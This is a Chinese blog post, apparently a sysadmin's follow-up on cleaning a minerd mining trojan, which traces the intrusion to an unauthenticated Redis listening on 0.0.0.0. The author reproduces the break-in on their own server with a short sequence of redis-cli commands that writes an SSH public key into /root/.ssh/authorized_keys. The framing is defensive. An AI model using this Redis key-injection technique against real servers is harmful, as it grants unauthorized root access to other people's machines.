minerd木马攻击处理(2)

2024-08-17 21:52:10 217人阅读

杀毒算完成了，可是他是怎么进来的呢。。。因为是我刚安装的系统，就只装了个redis和rabbitmq 其他应用都没有呢

我发现我的redis的 bind 0.0.0.0:6379

默认的。。。。应该是这边进来的。我自己做了下尝试。。。

[root@ll_sas01 ~/.ssh]# redis-cli

127.0.0.1:6379> set aa "公钥"

OK

127.0.0.1:6379> config set dir /root/.ssh/

OK

127.0.0.1:6379> config set dbfilename "authorized_keys"

OK

127.0.0.1:6379> save

[root@ll_sas01 ~/.ssh]# cat authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAABdadasdAAQEAvPgr/WFKd9h/3e2ik6BmLj4OIdnBNJelaNCOAWwdKQx0WjDtFjN/BvO3vkg4awwYwp3K

+UyAGob438pZnqNR37d1RrU7OzBolJ9NnTLPF03gI2aZpfW439T167bxHmKWYzN5vexTNv2orKWaQxMJtjN3xAwzpxiugaiguoleTTxBKG9TFjjBDblLYAoaVdylRLQLUwfCJ

/WK50rK++hawBS15t6r9

/zTuMD5TCsAJNEN88cPDOuEcnNwtLydtftH1BX3tPISSHtS4VwTr/LdAz40O9lKTTeU/JDHSIIRr95u2Y6/mhaLJwwLp/AFUB/NtF3HOIY75yG/F5k0q1fCaw

== root@dawdaw

夭寿拉。妈蛋的竟然真的这样可以吧自己的公钥刷进来。。。

奉劝大家不要黑别人的服务器，运维何苦为难运维。。。

通过这个网站可以查到开放的数据，就不给大家公开了，我得数据可能就是在这里被获取的。

技术分享

黑客攻击事件到此完了

本文出自 “aolens·程超” 博客，请务必保留此出处http://aolens.blog.51cto.com/7021142/1865994

minerd木马攻击处理(2)

声明：以上内容来自用户投稿及互联网公开渠道收集整理发布，本网站不拥有所有权，未作人工编辑处理，也不承担相关法律责任，若内容有误或涉及侵权可进行投诉：投诉/举报工作人员会在5个工作日内联系你，一经查实，本站将立刻删除涉嫌侵权内容。

联系
我们